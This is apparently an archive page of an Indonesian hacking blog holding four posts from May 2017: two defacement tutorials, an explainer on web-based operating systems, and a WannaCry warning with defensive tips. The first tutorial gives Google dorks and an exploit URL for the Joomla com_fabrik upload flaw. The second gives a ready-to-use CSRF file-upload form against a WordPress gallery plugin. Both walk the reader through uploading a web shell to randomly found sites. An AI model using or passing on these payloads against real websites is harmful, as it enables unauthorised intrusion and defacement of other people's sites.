Mei 2017 - HeroIT

Learn until whenever

Sabtu, 27 Mei 2017

Deface Metode com_fabrik

Mei 27, 2017 0
Deface Metode com_fabrik




Selamat malam semuanya 😊kali ini gua mau kasih tutorial deface metode com_fabrik
hmm metode ini tergolong metode yg mudah jadi yang udah expert mundur dulu ya
oke langsung aja ya

Bahan :

1. Dork :

     inurl:index.php?option=com_fabrik
     inurl:index.php/component/fabrik/ site:
     inurl:index.php?option=com_fabrik&view= site:
     inurl:importcsv.php site:
     inurl:viewTable?cid= site:com
     inurl:viewTable?cid= site:id
     
     use your brain guys :* gunakan otak bokepers lu biar dapet yg verawan & mulus 😅

2. Exploit

/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

/index.phpoption=com_fabrik&c=import&view=import&filetype=csv&tableid=1 echercher

3. Kesabaran (ini yang penting karena deface gak cuma butuh otak buat berfikir juga butuh      kesabaran)


Langkah :


1.Dorking dulu di gugel cuk

2.Pilih salah satu site nya

3.Kalo udah masukin exploit di belakang site yg ente pilih contoh http://target.co.li/ (nah taro exploit    nya disini )

4.Kalo vuln muncul uploader nya

5.udah deh tinggal upload sc / shell ente

oke sekian tutor dari gw saran kalo mau tebas index backup dulu cuk
see you
thanks to : BERANDAL
kalo bingung bisa liat video nya
di sini







Kamis, 25 Mei 2017

Mengenal Sistem Operasi Berbasis web

Mei 25, 2017 0
Mengenal Sistem Operasi Berbasis web







Malem Om , Tante , Pak , Bu , say ?? wkwkwkwk malem ini gw mau bahas tentang sistem operasi basis website, loh kok ??? emang ada lho, oke sebelum kita bahas sistem operasi basis web 
alangkah baiknya kita bahas apa  itu sistem operasi dari pengertian,fungsi dll


1. PENGERTIAN SISTEM OPERASI

Secara Umum, Pengertian Sistem Operasi adalah perangkat lunak (software) pada komputer yang bertugas dalam menggontrol dan memanajemen perangkat keras dan sebagai operasi-operasi dasar sistem, termasuk dalam menjalankan software aplikasi misalnya program-program pengolah data untuk mempermudah kegiatan manusia. Dalam bahasa Inggris, sistem operasi disebut dengan Operating System, atau disingkat OS.

sedangkan menurut Wikipedia sistem operasi atau operating system adalah perangkat lunak sistem yang mengatur sumber daya dari perangkat keras dan perangkat lunak, serta sebagai jurik (daemon) untuk program komputer. Tanpa sistem operasi, pengguna tidak dapat menjalankan program aplikasi pada komputer mereka, kecuali program booting.

Sistem Operasi berfungsi sebagai penghubung antara lapisan hardware dan lapisan software. Selain dari itu sistem operasi komputer melakukan semua perintah penting dalam komputer, serta menjamin aplikasi-aplikasi yang berbeda fungsinya dapat berjalan lancar secara bersamaan tanpa adanya hambatan. Sistem Operasi Komputer menjamin, aplikasi perangkat lunak lainnya dapat memakai memori, melakukan input serta output ke peratan lain, dan memiliki akses ke setiap sistem file. Sistem operasi juga mengatur, jika aplikasi berjalan secara bersamaan, sehingga proses di komputer berjalan mendapatkan waktu yang cukup dan tidak saling mengganggu perangkat yang lain.

2.BAGIAN-BAGIAN SISTEM OPERASI PADA KOMPUTER

Secara umum, sistem operasi komputer terdiri atas beberapa bagian yaitu..

  • Mekanisme Boot, adalah meletakkan kernel ke dalam memori
  • Kernel yaitu inti dari sebuah sistem operasi
  • Command Interpreter atau shell, yang bertugas dalam membaca input dari pengguna
  • Pustaka-pustaka, yaitu yang menyediakan kumpulan fungsi dasar dan standar yang dapat dipanggil oleh apliaksi lain 
  • Driver untuk berinteraksi dengan hardware eksternal, sekaligus untuk mengontrolnya
3.FUNGSI SISTEM OPERASI / OPERATING SYSTEM

oke kita sudah tau pengertian,bagian-bagian sistem operasi ya bisa di katakan sistem operasi memiliki fungsi yang sangat penting bagi sebuah kmputer, berikut fungsi sistem operasi :

  • Membuat komputer menjadi lebih mudah dan menarik serta nyaman digunakan 
  • Memungkinkan sumberdaya komputer digunakan secara efisien 
  • Disusun atau diprogram untuk sedemikian rupa memungkinkan menerima perubahan/pengembangan baru yang efektif dan efisien, dengan pengujian sistem tanpa mengganggu layanan yang telah ada.
Tidak hanya itu, fungsi sistem operasi komputer dibagi dalam tiga bagian yaitu sebagai mediator, sebagai wadah, dan sebagai penerjemah.

  • Fungsi sistem operasi sebagai mediator, adalah sistem operasi komputer menjadi penengah atau penghubung perangkat keras komputer (hardware) dengan perangkat lunak komputer (sofware). 
  • Fungsi sistem operasi sebagai wadah adalah sistem operasi komputer tempat menginstal suatu aplikasi, dan sebaliknya. 
  • Fungsi sistem operasi komputer sebagai penerjemah adalah sistem operasi komputer melakukan proses penerjemahan bahasa program untuk ditampilkan ke layar monitar yang berupa kombinasi grafis dan teks. 
Fungsi Umum Sistem Operasi 

Resource manager adalah pengelolaan sumber daya dan mengalokasikannya. Misalnya memori, cpu, disk drive dan perangkat lainnya.

nah kita sudah tau kan apa itu sistem operasi,pengertian,fungsi, dan bagian-bagian nya 
oke bahasan selanjutnya yaitu mengenai sistem operasi berbasis web


SISTEM OPERASI BERBASIS WEB

web (web-based operating system) merupakan salah satu jenis sistem operasi terkini yang memanfaatkan kemampuan jaringan dan bahasa pemrograman internet dalam me-render sebuah sistem operasi pada website. Istilah WebOS mulai dikenal sejak tahun 1999 dan sejak itu layanan ini mulai diterapkan pada beberapa perusahaan besar. Sistem operasi berbasis web juga diyakini akan mampu menggeser kepopuleran sistem operasi masa kini.
Keuntungan menggunakan Sistem operasi berbasis web:
A. Data yang disimpan dalam sistem operasi jenis ini dapat diakses dari mana saja dari seluruh dunia.
B. Data yang disimpan juga dapat diakses oleh orang lain pada saat yang sama (multiple file sharing)
C. Sangat berguna apabila kita sering mengakses internet dari warung internet namun sistem operasi yang digunakan tidak familiar.

D. Sebagian besar sistem operasi berbasis web menyediakan fasilitas enkripsi khusus untuk setiap pelanggannya apabila mereka hendak menyimpan file-file mereka di sini.
E. Anda tidak perlu direpotkan tentang masalah instalasi software ataupun update-nya karena sistem operasi berbasis web telah menyediakannya untuk anda.
F. Sistem operasi berbasis web aman dari virus dan threat jahat lainnya.
G. Tidak diperlukan pengetahuan mendalam tentang sistem operasi untuk menggunakan sistem operasi berbasis web.
Kerugian menggunakan sistem operasi berbasis web:
A. Karena berbasis web, sistem operasi ini hanya akan efektif penggunaannya melalui akses internet. Besarnya volume data seringkali menyebabkan beberapa sistem operasi virtual mengalami crash/hang, disamping akses ke desktop yang juga lambat.
B. Data yang disimpan dalam ruang virtual sistem operasi dapat sewaktu-waktu hilang apabila sistem operasi yang bersangkutan menghilang dari dunia maya.
C. Ada beberapa sistem operasi yang menggunakan elemen flash untuk desktop environment dan navigasinya sehingga cukup menyulitkan pengguna yang kurang begitu memahami karakteristik elemen flash.
D. Tidak semua aplikasi berjalan secara lancar. Ada beberapa aplikasi yang mungkin akan mengalami lag/crash dalam penggunaanya mengingat sistem operasi jenis ini juga dipengaruhi oleh jenis browser yang digunakan.
E. Minimnya jenis aplikasi yang kompatibel dengan sistem operasi berbasis web yang bersangkutan.
Beberapa contoh Sistem Operasi berbasis web
1. CymOS (cymos.com)
cmyOS menawarkan desktop/sistem operasi online gratis untuk semua pengguna internet. Berbasiskan komunitas open source, cmyOS bekerja untuk menghasilkan aplikasi unggulan yang akan memberikan pengalaman online baru untuk developer dan browser.
2. Desktoptwo (desktoptow.com)
DesktopTwo adalah sebuah desktop online gratis yang dikembangkan oleh Sapotek dimana memiliki tampilan, karakteristik, dan fungsi layaknya desktop biasa dalam suatu sistem operasi.
3. G.ho.st (www.g.ho.st/home)
G.ho.st Inc dibangun pada tahun 2006 untuk mengembangkan “Global Hosted Operating System”, sistem operasi berbasis web yang diyakini paling diakui di dunia. G.ho.st mengintegrasikan semua aplikasi software berbasis web ke dalam komputer virtual gratis., dengan mempersembahkan sebuah desktop web, sistem file online tunggal, satu account, berbagi, dan kolaborasi dari semuanya. Untuk setiap orang yang menginginkan aktifitas berkomputer pribadi mereka menjadi mobile, G.ho.st Virtual Computer (VC) mempersembahkan sesuatu alternatif nyata untuk pengguna Windows – sebuah perangkat komputer pribadi lengkap yang disimpan dalam web dan dapat diakses dari banyak web browser.
4. Jooce (jooce.com)
Jooce sangat canggih, desktop online privat – dengan kemampuan berbagi file untuk publik. Sngat aman, ruang online untuk menyimpan file, dapat mendengarkan, melihat, dan berbagi dengan teman anda tentang file-file anda, foto, musik, dan video-video koleksi anda.

oke makin nambah kan ilmu kita mengenai sistem operasi oke semoga bermanfaat yaa 
see you :*

Senin, 22 Mei 2017

Deface wordpress-theme-dreamworkgallery

Mei 22, 2017 0
Deface wordpress-theme-dreamworkgallery








hello friend
kali ini gua mau share tutor deface wp-theme-dreamworkgallery

oke langsung ea

bahan

1. dork  :  inurl:/wp-content/plugins/wp-dreamworkgallery/ kembangin biar dapet fresh and ferawan

2. csrf :

<form action="http:/target/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" />
<input type="submit" value="HAJAR!" /> </form>

copy ni csrf via notepad kalo udah simpen dengan extensi html

langkah :

1.dorking gugel

2.pilih salah satu site nya

3.copy site masukin ke csrf nih di sini

4. simpan lagi csrf nya, trusss buka csrf nya lewat web browser ntar keluar tampilan kek gini
    nah di sini lah kita upload shell/script deface kita


5.upload deh shell /script nya 
6.kalo udah berhasil tampilanya kek gini ada letak file upload an kita 



7.kalo mau liat hasil deface nya tinggal copy letak file yg kita upload



8. nah trus tekan enter taraaa berhasil kan



kalo kurang jelas bisa liat video ini




oke sekian dulu tutor dari saya, ini cuma buat pembelajaran aja yaaa kalo ada apa2 saya gak bertanggung jawab  see you


thanks to BERANDAL



Sabtu, 13 Mei 2017

SERANGAN WANNACRY RANSOMEWARE SAMPAI KE INDONESIA

Mei 13, 2017 0
SERANGAN WANNACRY RANSOMEWARE SAMPAI KE INDONESIA

Baru-baru ini kominfo menghimbau bagi pengguna internet di indonesia untuk lebih hati-hati
karena, WannaCryptor dikenal juga sebagai WCRY, kali ini melakukan serangan dalam gelombang besar ke seluruh dunia. Berbagai perusahaaan baik besar maupun kecil, ikut menerima dampak dari ransomware berbahaya ini.kabarnya ESET yang mendeteksi varian WannaCry ini sebagai Win32/Filecoder.
WannaCryptor.D trojan ikut bertarung menghadapi serangan membabi buta dari penjahat siber yang berada di belakang ransomware WannaCry.

     Sampai saat ini, belum terdata secara pasti berapa banyak perusahaan di Indonesia yang terkena serangan dari ransomware WannaCry. Namun, ESET Indonesia mendeteksi kehadiran WannaCry di Indonesia, dan berhasil menaklukan ransomware ini saat mencoba menyerang komputer yang menggunakan antivirus ESET.

ESET telah mengklaim bisa menangani virus wannacry ini, dengan memasukan virus ini ke database nya win32/filecoderwannacryptor.
sasaran virus ini adalah SMB (server message box) bisa jadi sasaran nya lab komputer sekolah kalian, pastikan jangan sembarangan membuka email, dan senantiasa mengupdate database antivirus
kalo bisa untuk mengantisipasi serangan ini backup file2 penting kamu agar tidak terjadi hal yang tidak di inginkan, matikan fungsi macros dan SMBv1 di server sekolah,blok port 139/445 & 3389
pake antivirus eset.
ingat selama ip router bisa akses publik virus ini akan terus menyebar,dan bagi pengguna windows xp
di sarankan untuk update windows karena patch dari microsoft sudah tidak tersedia